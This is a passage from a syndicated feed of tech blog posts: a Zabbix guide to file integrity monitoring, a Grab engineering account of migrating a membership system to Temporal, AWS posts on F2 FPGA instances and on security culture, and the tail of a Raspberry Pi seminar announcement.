Later in the year, Jesús Moreno-Leon from the University of Seville will help us consider the  thorny but essential question of how we measure AI literacy. Jesús will present an assessment instrument that has been successfully implemented in several research studies involving thousands of primary and secondary education students across Spain, discussing both its strengths and limitations.

What to expect from the seminars

Our seminars are designed to be accessible to anyone interested in the latest research about AI education — whether you’re a teacher, educator, researcher, or simply curious. Each session begins with a presentation from our guest speaker about their latest research findings. We then move into small groups for a short discussion and exchange of ideas before coming back together for a Q&A session with the presenter. 

An educator is helping two young learners with a coding task.

Attendees of our 2024 series told us that they valued that the talks “explore a relevant topic in an informative way“, the “enthusiasm and inspiration”, and particularly the small-group discussions because they “are always filled with interesting and varied ideas and help to spark my own thoughts”. 

The seminars usually take place on Zoom on the first Tuesday of each month at 17:00–18:30 GMT / 12:00–13:30 ET / 9:00–10:30 PT / 18:00–19:30 CET. 

You can find out more about each seminar and the speakers on our upcoming seminar page. And if you are unable to attend one of our talks, you can watch them from our previous seminar page, where you will also find an archive of all of our previous seminars dating back to 2020.

How to sign up

To attend the seminars, please register here. You will receive an email with the link to join our next Zoom call. Once signed up, you will automatically be notified of upcoming seminars. You can unsubscribe from our seminar notifications at any time.

We hope to see you at a seminar soon!

The post How can we teach students about AI and data science? Join our 2025 seminar series to learn more about the topic appeared first on Raspberry Pi Foundation.

File Integrity Monitoring with Zabbix

Post Syndicated from Paulo R. Deolindo Jr. original https://blog.zabbix.com/file-integrity-monitoring-with-zabbix/29460/

We have often seen Zabbix used as a simple tool for monitoring network assets as well as Information and Communication Technology (ICT) infrastructure. While this concept is not incorrect, it is equally important to understand that with the advancement of Zabbix versions, more and more functionalities have been made available for other types of monitoring, enabling advanced data analysis and stunning visualizations through new and modern widgets in the frontend layer.

In this short blog post, we will explore some of the existing yet under-discussed features of Zabbix that contribute to the maturity of the cybersecurity discipline within organizations — a topic that is becoming increasingly critical in the corporate environment.

FIM – File Integrity Monitoring

FIM is a very common concept among information security tools, specifically in tools like SIEM/XDR (Security Information Event Management/Extended Detection and Response). The name is quite suggestive of its usability, but while some tools highlight this feature as one of their main functionalities, it is also available for those who use Zabbix – just not explicitly labeled under this name.
Here, we will approach FIM as a concept rather than just a functionality. This is because we aim to achieve a result, not merely have a menu with a name to claim compliance while using our tool. In fact, the outcome needs to be more important than mere “marketing.”

What should we expect from FIM?

Imagine that your servers have certain directories and/or files so critical that you cannot afford to neglect monitoring them for changes, insertions, or deletions. Additionally, these files may have owners and properties that must not be altered – otherwise, the systems that depend on them might lose the ability to read or execute their functions. This, at a minimum, is what we expect from FIM as a functionality.
To illustrate this a bit further, consider a database service like MariaDB:

# ls -lR /etc/mysql/
/etc/mysql/:
total 24
drwxr-xr-x 2 root root 4096 Jun 25 18:40 conf.d
-rwxr-xr-x 1 root root 1740 Nov 30 2023 debian-start
-rw------- 1 root root 544 Jun 25 18:43 debian.cnf
-rw-r--r-- 1 root root 1126 Nov 30 2023 mariadb.cnf
drwxr-xr-x 2 root root 4096 Sep 30 16:36 mariadb.conf.d
lrwxrwxrwx 1 root root 24 Oct 20 2020 my.cnf -> /etc/alternatives/my.cnf
-rw-r--r-- 1 root root 839 Oct 20 2020 my.cnf.fallback

/etc/mysql/conf.d:
total 8
-rw-r--r-- 1 root root 8 Oct 20 2020 mysql.cnf
-rw-r--r-- 1 root root 55 Oct 20 2020 mysqldump.cnf

/etc/mysql/mariadb.conf.d:
total 40
-rw-r--r-- 1 root root 575 Nov 30 2023 50-client.cnf
-rw-r--r-- 1 root root 231 Nov 30 2023 50-mysql-clients.cnf
-rw-r--r-- 1 root root 927 Nov 30 2023 50-mysqld_safe.cnf
-rw-r--r-- 1 root root 3795 Sep 30 16:36 50-server.cnf
-rw-r--r-- 1 root root 570 Nov 30 2023 60-galera.cnf
-rw-r--r-- 1 root root 76 Nov 8 2023 provider_bzip2.cnf
-rw-r--r-- 1 root root 72 Nov 8 2023 provider_lz4.cnf
-rw-r--r-- 1 root root 74 Nov 8 2023 provider_lzma.cnf
-rw-r--r-- 1 root root 72 Nov 8 2023 provider_lzo.cnf
-rw-r--r-- 1 root root 78 Nov 8 2023 provider_snappy.cnf

All the files, directories, and subdirectories listed above have already been configured, and the system (whatever it may be) is functioning perfectly. However, if someone suddenly decides to alter a configuration in the file /etc/mysql/mariadb.conf.d/50-server.cnf, this could be disastrous for the service. Regardless, the important thing to do is to monitor this scope and notify the relevant stakeholders so that an appropriate analysis can be conducted.

Zabbix can help with that. Let’s see how.

Zabbix and File Integrity Monitoring functions

Consider that the Zabbix agent is installed on the server to be monitored:

vfs.dir.count[/etc/mysql]

With this key, we can count the objects present within the /etc/mysql directory. Subsequently, we can create a trigger to be activated if there is any change related to the initial collection count, such as someone deleting or adding a file or directory in this location.

 

 

 

 

 

vfs.dir.size[/etc/mysql]

With this key, we can determine the total size in bytes used by the directories and configuration files. In the future, we can create a trigger that activates when this size changes, indicating the deletion or addition of a file.

vfs.file.exists[/etc/mysql/mariadb.conf.d/50-server.cnf]

Among several important files, we may have a greater interest in some configuration files, and we can validate their existence by creating a trigger that activates when such a file ceases to exist. This will clearly indicate that something important has disappeared.

In this case, the value “1” represents “OK” for the existence of the file.

vfs.file.cksum[/etc/mysql/mariadb.conf.d/50-server.cnf,sha256]

In addition to verifying the existence of the configuration file we consider important, we need to be informed if anything in it changes. This key handles that by generating a hash in a variety of possible formats, allowing a trigger to be activated in case of a hash change, which would reflect a file modification (unfortunately, we won’t know what exactly was altered).

vfs.file.regmatch[/etc/mysql/mariadb.conf.d/50-server.cnf,^max_connections\s+=\s+(\d+)]

We might have a specific parameter of interest – for example, the maximum number of connections allowed to the database. Monitoring this is important because if the configuration is set to the default value, it means that no “tuning” has been applied to the database. Alternatively, it could mean that someone simply deleted or commented out this line, causing it to be ignored by the system. Therefore, verifying whether the parameter exists and is properly configured is crucial.

In this case, the value “1” indicates that the regular expression was successfully found, meaning that the configuration or parameter we need to exist is indeed present.

vfs.file.regexp[/etc/mysql/mariadb.conf.d/50-server.cnf,^max_connections\s+=\s+(\d+),,,,\1]

Beyond verifying the existence and integrity of the file, it is also possible to determine what was changed within it. However, we would need to specify the configuration of interest using a regular expression. For example, considering that the maximum number of connections allowed by the database system is “x,” we can be alerted by a trigger if it changes to “y,” “z,” or any other value different from “x.” This setup allows us to monitor the parameter of interest with precision. This logic can be applied to any other parameter you consider important. Of course, there is another way to automate this process, but we will not cover that automation here.

In this case, the parameter defining the maximum number of connections is not only present, but we also know the exact number of connections. This way, we will have a history of the applied parameterization in case it is changed at any point.

vfs.file.owner[/etc/mysql/mariadb.conf.d/50-server.cnf]

vfs.file.owner[/etc/mysql/mariadb.conf.d/50-server.cnf,group]

The two keys above allow us to determine the owner of a file and (in the case of a Linux system) the owning group. We can also choose to monitor the user’s name or their UID in the system. Naturally, a trigger can be activated to alert us in case of an ownership change, indicating that someone might be “taking over” an important file in the system.

vfs.file.permissions[/etc/mysql/mariadb.conf.d/50-server.cnf]

The key above allows us to determine a file’s permissions—read, write, read and write, execution, or a special permission bit. Naturally, a trigger can be activated to alert us if there is any permission change in the file.

vfs.file.attr[/etc/mysql/mariadb.conf.d/50-server.cnf]

The key above does not exist by default. It was created with a UserParameter, which is a customization for verifying a command that, in this case, checks the attributes of a specific file. Consider the following command executed directly in your system’s terminal:

# lsattr /etc/mysql/mariadb.conf.d/50-server.cnf
--------------e------- /etc/mysql/mariadb.conf.d/50-server.cnf

What interests us are the attributes:

--------------e-------

If someone who invades the system modifies the attribute of a file (for example) using this command…

# chattr +A /etc/mysql/mariadb.conf.d/50-server.cnf
# lsattr /etc/mysql/mariadb.conf.d/50-server.cnf
-------A------e------- /etc/mysql/mariadb.conf.d/50-server.cnf

…it could mean that someone does not want the system to log when this file was accessed (refer to the chattr command manual). Additionally, any other attribute can be added or removed, which poses a risk to the system because these attributes can alter how files are accessed, stored on disk, and later read. Therefore, we can create a UserParameter as follows:

# cd /etc/zabbix/zabbix_agent2.d/
# echo "UserParameter=vfs.file.attr[*],lsattr \$1 | cut -d\" \" -f1" > attr.conf
# zabbix_agent2 -R userparameter_reload

Finally, we can test the reading of attributes directly from the terminal:

# zabbix_agent2 -t vfs.file.attr[/etc/mysql/mariadb.conf.d/50-server.cnf]
vfs.file.attr[/etc/mysql/mariadb.conf.d/50-server.cnf][s|-------A------e-------]

You can also try this now through the frontend.

When creating the item, don’t forget to create the trigger that should be activated in case there is a change in the attribute of a file, whatever it may be.

Paying attention to file access and modification times

To delve a bit deeper into the concept of FIM, we should ask ourselves if we are monitoring file access and modifications concerning their timestamps. In a way, if we have implemented everything proposed above, the answer is yes.

That said, there is an easier way to keep track of all the things we’ve discussed. It involves using this key:

vfs.dir.get[/etc/mysql]

When creating an item with this key, we will recursively obtain all its objects, such as subdirectories and files. The output format will be a JSON, which allows us to create LLD (Low-level Discovery) rules to automate FIM. Below is a small snippet of the monitoring output:

{
"basename": "mariadb.cnf",
"pathname": "/etc/mysql/mariadb.cnf",
"dirname": "/etc/mysql",
"type": "file",
"user": "root",
"group": "root",
"permissions": "0644",
"uid": 0,
"gid": 0,
"size": 1126,
"time": {
"access": "2024-11-30T23:01:01-0300",
"modify": "2023-11-30T01:42:37-0300",
"change": "2024-06-25T18:41:01-0300"
},
"timestamp": {
"access": 1733018461,
"modify": 1701319357,
"change": 1719351661
}
...

Considering that the output includes all objects from the main directory, this would be the most sensible approach to configure our FIM. However, it is necessary to create the LLD and prototypes. We will not cover this in detail in this article, but this is the path I recommend you follow.

Below is a “blueprint” for an LLD to create automated File Integrity Monitoring:

The “Master item”:

The “Dependent rule”:

The LLD Macro:

The item prototypes:

Below are the components of a trigger prototype (I created just one to symbolize a type of alert for file modification):

Name: Object: {#BASENAME} just changed

Event name: Object: {#BASENAME} just changed. Last hash: {ITEM.VALUE} The previous one: {?last(/MySQLDB/vfs.file.cksum["{#PATHNAME}",sha256],#2)} Object: {#BASENAME} just changed. Last hash: {ITEM.VALUE} The previous one: {?last(/MySQLDB/vfs.file.cksum["{#PATHNAME}",sha256],#2)}

Severity: Warning

Expression: last(/MySQLDB/vfs.file.cksum["{#PATHNAME}",sha256],#1)<>last(/MySQLDB/vfs.file.cksum["{#PATHNAME}",sha256],#2)

And then, some results:

Conclusion

The implementation of a robust File Integrity Monitoring system helps to ensure the security of IT infrastructure. Detecting unauthorized changes in critical files helps prevent attacks, identify security breaches, and ensure the integrity and availability of systems. With Zabbix, we have an effective solution to implement FIM, enabling process automation and the real-time visualization of changes. This monitoring not only reinforces protection against intrusions but also facilitates auditing and compliance with regulatory standards.

The main benefits of integrating File Integrity Monitoring with Zabbix include:

1. Early detection of changes in critical files, enabling quick responses.
2. Enhanced compliance with security regulations and internal policies.
3. Protection against malware and ransomware by identifying changes in essential files.
4. Ease of auditing with automated reports and modification histories.
5. Greater visibility and control over the integrity of data and systems in real time.
6. Operational efficiency through the automation of alerts and reports.
7. Improved proactive security, helping prevent attacks before they become critical.

By using Zabbix, organizations can strengthen their security posture and optimize risk management, ensuring that any unauthorized changes are detected and promptly corrected.

 

 

The post File Integrity Monitoring with Zabbix appeared first on Zabbix Blog.

Turbocharging GrabUnlimited with Temporal

Post Syndicated from Grab Tech original https://engineering.grab.com/turbocharging-grabunlimited-with-temporal

Welcome to the behind-the-scenes story of GrabUnlimited, Grab’s flagship membership program. We undertook the mammoth task of migrating from our legacy system to a Temporal1 workflow-based system, enhancing our ability to handle millions of subscribers with increased efficiency and resilience. The result? A whopping 80% reduction in open production incidents, and most importantly – an improved membership experience for our users. In this first part of the series, you will learn how to design a robust and scalable membership system as we delve into our own experience building one.

What is GrabUnlimited?

The idea behind GrabUnlimited, is pretty simple: you pay a monthly fee, you get monthly benefits as a member (e.g discounted food delivery fee). A membership system plays a key role in enhancing user experience by giving them more value for money, but also by building loyalty, making Grab their go-to app for everyday needs. However, as this program grew and evolved, it brought along unique challenges and opportunities.

With the initial triumph and significant surge in subscriber count by over 1000% from January 2022 to June 2023 – which we were super proud of! – the architecture that supported GrabUnlimited was starting to show signs of strain. Common subscriber concerns such as not receiving their membership benefits, along with developer issues marked by an increase in service outages highlighted the system’s low resiliency. The culprit? A backend service that, while functional, was not built to efficiently manage the complexities of a rapidly scaling membership model.

Deep dive into our previous system design

As engineers, we know that deciding to migrate any system to a new one is like changing the engine of a running car. It requires meticulous evaluation of the existing systems, a deep dive into the issues and their root causes, and a thorough analysis of potential solutions and their trade-offs.

How was GrabUnlimited designed?

Initially, GrabUnlimited systems were designed for an experiment and not a full-fledged regional product. The idea was to try it out as a minimum viable product over a restricted segment of a few hundred thousand users. Let’s first have a look at how the membership program works.

Figure 1. GrabUnlimited life of a membership flowchart.

Under the hood, our membership system relies on two main flows

  • Membership purchase: The user enrols for a certain duration (e.g 3 months), completes the payment through our Payment service, and receives benefits via our Reward service.
  • Membership renewal: A daily cron job2 checks which memberships need renewal, processes the payment, and delivers the benefits.

We employed a state machine3 approach to break down the membership process into smaller chunks called state handlers. For instance, a membership might transition through ‘Init’, ‘Charged’, ‘Rewarded’, and ‘Active’ states. To operate these states, we used Amazon’s Simple Queue Service (SQS). SQS acts as a manager, delegating state handlers to workers (our service) and monitoring the status of the state handler. If a worker fails to complete a task, SQS reassigns the task to another worker, ensuring no task is lost. The load is also spread across multiple workers, helping with scalability.

To safeguard our system against duplicate tasks such as charging the user twice, when a worker takes up a task, it would use a Redis lock4 mechanism with a time-to-live (TTL) of five minutes preventing any other worker from picking up the same task. If a worker fails or crashes, the lock expires and another worker can pick up the job.

So far, so good.

Figure 2. GrabUnlimited previous system design overview.

With our success came many challenges

As our subscriber base grew, we experienced an increase in system outages. To address this, we scrutinised metrics like the number of support tickets and gauged the toll on our engineering team. This included the time spent patching up issues and the opportunity cost of not developing new features or improvements.

From our subscribers’ point of view, we saw a steady increase in reported incidents.

  • Users were blocked because their membership status was corrupted in our database.
  • Memberships were not automatically renewed, or users were not able to resubscribe.
  • Users were not receiving their benefits after renewing their membership.

From the engineering team’s perspective, we were dedicating one engineer every week to battle these incidents full time. The on-call engineers were not only tasked with manually fixing all customer reports but were also swamped with frequent system alerts. This situation had three detrimental impacts on our team:

  • We were constantly putting out fires instead of addressing the root causes.
  • We were spending resources that could have been used to enhance our customers’ experience.
  • Our team’s motivation and confidence was taking a big hit.

Finding the architectural culprit

The first step was to clearly identify and understand the issues within our systems. We looked at the frequency of failures and their root cause. From there, we were able to detect recurring patterns, which led us to four major issues in our architecture.

Scalability

Our system’s cron job, which retrieves all daily memberships due for renewal from our database, becomes slower and more resource-intensive as the number of members increases. Despite our attempt to alleviate high database usage by dividing the process into multiple batches and running several cron jobs, we were still experiencing significant surges each time a cron job runs. So our only viable solution was vertical scaling5 of the database. In other words, we had a serious bottleneck in our system.

Figure 3. Database queries per second during membership renewals at night.

Concurrency6

Picture this – A user tries to cancel their membership in the middle of the auto-renewal process, and voila, we have what we call a “zombie” state where the membership is both cancelled and renewed. This situation happens due to the limitations of our 5-minute Redis lock. If the renewal process holding the lock doesn’t complete within the timeout, the lock is released, enabling the cancel process to obtain the lock and run concurrently.

Resiliency7

What happens when the Rewards service faces an outage? The user buys a membership but doesn’t receive the rewards. It’s like throwing a party but the guests never arrive. We had three issues here:

  • In the event where upstream services had an outage, we relied on SQS’s maximum number of retries without exponential backoff8, causing potential overloads on recovering services.
  • Our cron job being housed within the service itself was susceptible to interruptions during outages or service restarts.
  • Over time, the logic to transition between states in our state machine became complex and multi-responsibility as more states were added. This made our retry mechanism unreliable due to potential risks of double charging or double awarding users. Which leads us to our fourth culprit.

Idempotency9

Even when some steps could be retried, our system lacked idempotency guarantees – a safety net to ensure that a step could be repeated without unintended side effects. Although our critical upstream systems like Payments and Rewards support idempotency via idempotency keys, our service wasn’t originally designed with this in mind.

  • Users could be stuck in a state where the payment succeeded but they didn’t receive their benefits or received them twice, requiring manual intervention from engineers.
  • We were not able to auto-retry membership renewals if the cron job, database, or any service had an outage.
Figure 4. Example of Idempotency issue in our old system design. If a single task fails in a state handler, the whole step would be retried which could lead to a double awarding.

For example, consider a state handler “BenefitsAwarding” that follows these steps:

  1. Generate an idempotency key.
  2. Calls Reward service to award the first set of benefits to the subscriber using the key.
  3. Calls Reward service to award the second set of benefits to the subscriber using the key.

If step 3 fails due to an outage, and the step is retried and re-queued in SQS, it would restart from step 1. This generates a new idempotency key, meaning the Reward system wouldn’t recognize the retry and will award Benefits1 twice. One way to fix this with our current design is to substantially increase the number of states in our SQS state machine, to isolate tasks further rather than handling too much logic in a state handler. However, that would mean having hundreds of states making the whole process difficult to maintain.

Ultimately, most incidents traced back to one fundamental issue: Our systems were relying on a sequential process that couldn’t be easily replayed if any incident or disturbance happened during execution. We were placing all our bets on the happy path, a risky gamble indeed.

The Solution: Migrating our system to Temporal

Armed with a clear understanding of the problems and their impacts, we set out to explore potential solutions. This journey led us to consider refactoring our existing system or migrating to a new architecture that another team introduced to us: Temporal.

Enter Temporal

Temporal is an open-source workflow orchestration engine. Think of it as a more robust and battle-tested implementation of our previous SQS architecture. It’s designed to run millions of workflows concurrently and can recover/resume the state of a workflow execution at the exact point of failure even in the event of an outage. It has features like infinite retries, exponential backoff, rate limiting, and observability out of the box. This sounded exactly like what we needed! By using Temporal, we could offload the complexity of managing state transitions, retries, and task concurrency, allowing us to focus on our core business logic.

In order to make the right decision, we meticulously assessed our options over the following criteria: scalability10, reliability11, resiliency12, performance, development effort, cost, security, flexibility13, and testability14. We realised that most of what we needed to build to compensate for our system design gaps was already built into Temporal. Let’s have a sneak peek on how the architecture looks and how it solves all four major culprits we discussed.

Figure 5. GrabUnlimited new system design architecture.

Fixing our architecture culprits

Scalability

Let’s start with the easiest fix, remember our old cron job for membership renewals? We replaced it with Timer which allows a workflow to sleep and automatically wake up. Instead of renewing membership by batches, they are now renewed throughout the entire day based on the hour and minute when the user subscribed. What does this mean for us? We no longer need to fetch memberships from our database to trigger renewals. The workflow will resume at the due date to process the renewal, eliminating the database as a bottleneck.

Figure 6. Total queries per second (QPS) on database before and after the migration to Temporal.

Concurrency

Our legacy Redis lock mechanism was clearly not enough. However, with Temporal, we have alternative solutions to avoid race conditions. What happens if a user tries to cancel while the membership renewal workflow is being triggered? Temporal allows us to assign the same workflow ID to multiple workflows running mutually exclusive operations, ensuring only one operation runs at a time. Basically, we assigned the same workflow ID to both cancellation and renewal workflows, either cancellation happens first, removing the need to renew the consumer membership, or renewal takes the lead, and cancellation only happens after.

Figure 7. Total corrupted membership states (zombies) manually handled by engineers significantly decreased during our migration which started in February.

Resiliency

Out of the box, Temporal allowed us to put in place a few key resilience mechanisms like exponential backoff and infinite retry which was a key gap in our previous SQS architecture. That was great because we didn’t have to implement these mechanisms on our own and it meant that when calling key upstream services like Payment, we were able to precisely set our retry policies without overwhelming the service in case of an outage on their end.

Idempotency

Remember our fourth culprit from above? Our state handlers with SQS were performing too many tasks simultaneously, which made it risky to trust the retry process. This multi-responsibility nature introduced significant risks, including potential database corruption, double charging, and double awarding of benefits. Further breaking down these steps would result in hundreds of intermediary steps, each requiring careful maintenance and correct sequencing. With Temporal, you can imagine a membership as an ever-running workflow consisting of a sequence of steps that are automatically managed and retried in case of failures.

While this approach didn’t directly resolve idempotency issues, it made the system and the code more readable and allowed us to design steps with single responsibilities. This, in turn, made it simpler for us to develop and ensure these steps were idempotent.

Let’s take a look at our previous example with Temporal.

Figure 8. Temporal workflow: If a single task fails, only that task is retried.

Let’s consider the same use case where a member needs to receive their benefits. The tasks remain the same except we don’t need to persist the idempotency key as it will be in the Temporal workflow state instead.

  1. Generate idempotency keys.
  2. Calls Reward service to award the first set of benefits to the subscriber using the key abc1.
  3. Calls Reward service to award the second set of benefits to the subscriber using the second key xyz1.

If the “AssignBenefits2” step fails, and the process is retried by Temporal, it will restart directly from that step, thus preventing the double awarding we were experiencing with SQS. Thanks to this approach, we largely improved idempotency and resiliency in our system, which also led to great results in decreasing user reported incidents.

Figure 9. Total open production incidents reported by users related to membership issues from January to October 2024.

Embracing Temporal: Challenges and mindset shift

Transitioning to Temporal was quite a paradigm shift for our team. Rather than managing SQS state transitions, we could now focus on our core business logic while Temporal handled the complexities of state management, error handling, and retries. This change allowed us to streamline development, making our processes more intuitive.

However, this shift wasn’t without its challenges. Temporal features such as Workflow and Activity design, deterministic execution, and built-in retry mechanisms required a steep learning curve. We had to quickly adapt to Temporal’s new way of thinking, and while it took some time to master these tools, they ultimately led to a more robust and scalable system. The transition to Temporal brought not only technical improvements but also a new mindset for solving problems efficiently.

Key takeaways and conclusion

After a thorough analysis, we decided to transition our architecture to Temporal, as it outperformed on nearly every evaluation criteria. Here are the key takeaways from our experience:

  • Understand the problem, fix it for the future: Migrating legacy systems requires more than just patching up issues; it demands a deep dive into the root causes. For us, that meant addressing challenges in scalability, resiliency, and concurrency head-on to prevent future headaches.
  • Focusing on what matters: By adopting Temporal workflow orchestration, we could shift our focus to what really counts, core business logic. The result? An 80% reduction in production incidents and a much smoother post-migration experience.
  • Resilience and flexibility at scale: Temporal provided the infrastructure we needed to handle millions of subscribers with more robust processes for retries, idempotency, and state management. These features played a key role in ensuring the system remained stable and flexible as our user base grew.
  • The learning curve pays off: Every system migration has its challenges, but the payoff was transformative. Despite the initial hiccups, moving to Temporal allowed us to scale GrabUnlimited seamlessly while significantly improving both our development processes and the overall user experience.

Stay tuned for Part 2, where we dive into the challenges of the migration and the lessons learned along the way. How did we seamlessly migrate millions of users to this new architecture without disrupting their memberships? How did we implement Temporal without pausing development for months? And what roadblocks did we encounter as we scaled this solution to all our users? We’ll answer these questions and more in the next post.

Nothing would have been possible without the unwavering support of Abegail Nato Alcantara, Andrys Silalahi, Pavel Sidlo, and Renu Yadav.

Join us

Grab is the leading superapp platform in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across 700 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

Definition of terms

  1. Temporal: Temporal is an open-source workflow orchestration platform. It allows developers to build scalable and reliable applications using familiar development patterns and easy-to-use tools. 

  2. Cron job: A cron job is a time-based job scheduler in Unix-like operating systems. Users can schedule jobs (commands or scripts) to run periodically at fixed times, dates, or intervals. 

  3. State machine: A state machine is a behavioural model used in computer science. It represents a system in terms of states and transitions between those states. 

  4. Redis lock mechanism: Redis is an in-memory data structure store that can be used as a database, cache, and message broker. A Redis lock mechanism is a way to ensure that only one computer in a distributed network can process a certain piece of code at a time. 

  5. Vertical scaling: also known as “scaling up”, is the process of adding more resources (such as memory, CPUs, or storage) to an existing server or database to enhance its performance and capacity. Which is different from Horizontal scaling, also known as “scaling out”, the process of adding more servers or nodes to a system to handle increased load. 

  6. Concurrency: In computing, concurrency is the ability of different parts or units of a program, algorithm, or problem to be executed out-of-order or in partial order, without affecting the final outcome. 

  7. Resiliency: refers to the ability of a system or application to quickly recover from failures and continue its intended operation without significant interruption. 

  8. Exponential backoff: Exponential backoff is an algorithm that uses feedback to multiplicatively decrease the rate of some process, in order to gradually find an acceptable rate. In the context of the article, it refers to a strategy for retrying failed tasks with increasing wait times between retries. 

  9. Idempotency: An operation is idempotent if the result of performing it once is exactly the same as the result of performing it repeatedly without any intervening actions. 

  10. Scalability: The ability of a system to handle increased workload or demand by adding resources. 

  11. Reliability: The capacity of a system to consistently perform its intended functions without failure. 

  12. Resiliency: The ability of a system to recover quickly and effectively from failures or disruptions, ensuring continuity of service. 

  13. Flexibility: The architecture should be flexible enough to accommodate future changes in requirements. 

  14. Testability: The architecture should allow for effective testing to ensure the system works as expected. 

Now Available – Second-Generation FPGA-Powered Amazon EC2 instances (F2)

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/now-available-second-generation-fpga-powered-amazon-ec2-instances-f2/

Equipped with up to eight AMD Field-Programmable Gate Arrays (FPGAs), AMD EPYC (Milan) processors with up to 192 cores, High Bandwidth Memory (HBM), up to 8 TiB of SSD-based instance storage, and up to 2 TiB of memory, the new F2 instances are available in two sizes, and are ready to accelerate your genomics, multimedia processing, big data, satellite communication, networking, silicon simulation, and live video workloads.

A Quick FPGA Recap
Here’s how I explained the FPGA model when we previewed the first generation of FPGA-powered Amazon Elastic Compute Cloud (Amazon EC2) instances

One of the more interesting routes to a custom, hardware-based solution is known as a Field Programmable Gate Array, or FPGA. In contrast to a purpose-built chip which is designed with a single function in mind and then hard-wired to implement it, an FPGA is more flexible. It can be programmed in the field, after it has been plugged in to a socket on a PC board. Each FPGA includes a fixed, finite number of simple logic gates. Programming an FPGA is “simply” a matter of connecting them up to create the desired logical functions (AND, OR, XOR, and so forth) or storage elements (flip-flops and shift registers). Unlike a CPU which is essentially serial (with a few parallel elements) and has fixed-size instructions and data paths (typically 32 or 64 bit), the FPGA can be programmed to perform many operations in parallel, and the operations themselves can be of almost any width, large or small.

Since that launch, AWS customers have used F1 instances to host many different types of applications and services. With a newer FPGA, more processing power, and more memory bandwidth, the new F2 instances are an even better host for highly parallelizable, compute-intensive workloads.

Each of the AMD Virtex UltraScale+ HBM VU47P FPGAs has 2.85 million system logic cells and 9,024 DSP slices (up to 28 TOPS of DSP compute performance when processing INT8 values). The FPGA Accelerator Card associated with each F2 instance provides 16 GiB of High Bandwidth Memory and 64 GiB of DDR4 memory per FPGA.

Inside the F2
F2 instances are powered by 3rd generation AMD EPYC (Milan) processors. In comparison to F1 instances, they offer up to 3x as many processor cores, up to twice as much system memory and NVMe storage, and up to 4x the network bandwidth. Each FPGA comes with 16 GiB High Bandwidth Memory (HBM) with up to 460 GiB/s bandwidth. Here are the instance sizes and specs:

Instance Name vCPUs
FPGAs
FPGA Memory
HBM / DDR4
Instance Memory
NVMe Storage
EBS Bandwidth
Network Bandwidth
f2.12xlarge 48 2 32 GiB /
128 GiB
512 GiB 1900 GiB
(2x 950 GiB)
15 Gbps 25 Gbps
f2.48xlarge 192 8 128 GiB /
512 GiB
2,048 GiB 7600 GiB
(8x 950 GiB)
60 Gbps 100 Gbps

The high-end f2.48xlarge instance supports the AWS Cloud Digital Interface (CDI) to reliably transport uncompressed live video between applications, with instance-to-instance latency as low as 8 milliseconds.

Building FPGA Applications
The AWS EC2 FPGA Development Kit contains the tools that you will use to develop, simulate, debug, compile, and run your hardware-accelerated FPGA applications. You can launch the kit’s FPGA Developer AMI on a memory-optimized or compute-optimized instance for development and simulation, then use an F2 instance for final debugging and testing.

The tools included in the developer kit support a variety of development paradigms, tools, accelerator languages, and debugging options. Regardless of your choice, you will ultimately create an Amazon FPGA Image (AFI) which contains your custom acceleration logic and the AWS Shell which implements access to the FPGA memory, PCIe bus, interrupts, and external peripherals. You can deploy AFIs to as many F2 instances as desired, share with other AWS accounts or publish on AWS Marketplace.

If you have already created an application that runs on F1 instances, you will need to update your development environment to use the latest AMD tools, then rebuild and validate before upgrading to F2 instances.

FPGA Instances in Action
Here are some cool examples of how F1 and F2 instances can support unique and highly demanding workloads:

Genomics – Multinational pharmaceutical and biotechnology company AstraZeneca used thousands of F1 instances to build the world’s fastest genomics pipeline, able to process over 400K whole genome samples in under two months. They will adopt Illumina DRAGEN for F2 to realize better performance at a lower cost, while accelerating disease discovery, diagnosis, and treatment.

Satellite Communication – Satellite operators are moving from inflexible and expensive physical infrastructure (modulators, demodulators, combiners, splitters, and so forth) toward agile, software-defined, FPGA-powered solutions. Using the digital signal processor (DSP) elements on the FPGA, these solutions can be reconfigured in the field to support new waveforms and to meet changing requirements. Key F2 features such as support for up to 8 FPGAs per instance, generous amounts of network bandwidth, and support for the Data Plan Development Kit (DPDK) using Virtual Ethernet can be used to support processing of multiple, complex waveforms in parallel.

AnalyticsNeuroBlade‘s SQL Processing Unit (SPU) integrates with Presto, Apache Spark, and other open source query engines, delivering faster query processing and market-leading query throughput efficiency when run on F2 instances.

Things to Know
Here are a couple of final things that you should know about the F2 instances:

Regions – F2 instances are available today in the US East (N. Virginia) and Europe (London) AWS Regions, with plans to extend availability to additional regions over time.

Operating Systems – F2 instances are Linux-only.

Purchasing Options – F2 instances are available in On-Demand, SpotSavings Plan, Dedicated Instance, and Dedicated Host form.

Jeff;

Securing the future: building a culture of security

Post Syndicated from Carter Spriggs original https://aws.amazon.com/blogs/security/securing-the-future-building-a-culture-of-security/

According to a 2024 Verizon report, nearly 70% of data breaches occurred because a person was manipulated by social engineering or made some type of error. This highlights the importance of human-layer defenses in an organization’s security strategy. In addition to technology, tools, and processes, security requires awareness and action from everyone in an organization to recognize anomalies, escalate potential issues, and ultimately, mitigate risk.

Organizations that invest in a culture of security see better employee adoption of security controls, improved cybersecurity behavior, and a more effective use of cybersecurity resources, according to a 2024 Gartner analysis. This aligns with our own experience at AWS, where we deeply invest in our culture of security. Our leadership prioritizes security and builds it into our organizational structure. Everyone, regardless of role, views security as a shared responsibility. Security advocates and advisors are embedded in our teams to share their expertise, and innovation empowers our people to move fast while staying secure.

Building and maintaining a culture of security requires constant investment and focus. In our recent culture of security series with The Guardian, we share perspectives from AWS leaders on some of the most common questions that people ask us about how to create a culture of security:

The journey to creating a culture of security begins with the first step. Although this journey looks different for every organization, sharing what we’ve learned may spur ideas for how you can help create a security-first mindset in your own team or organization.

We invite you to explore the series and learn more about how AWS sustains a strong culture of security.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
 

Carter Spriggs
Carter Spriggs

Carter is a Product Marketing Manager at AWS.

How to Make Simple Email Service Resilient Across Two AWS Regions with Global Endpoints

Post Syndicated from Zip Zieper original https://aws.amazon.com/blogs/messaging-and-targeting/how-to-make-simple-email-service-resilient-across-two-aws-regions-with-global-endpoints/

Introduction

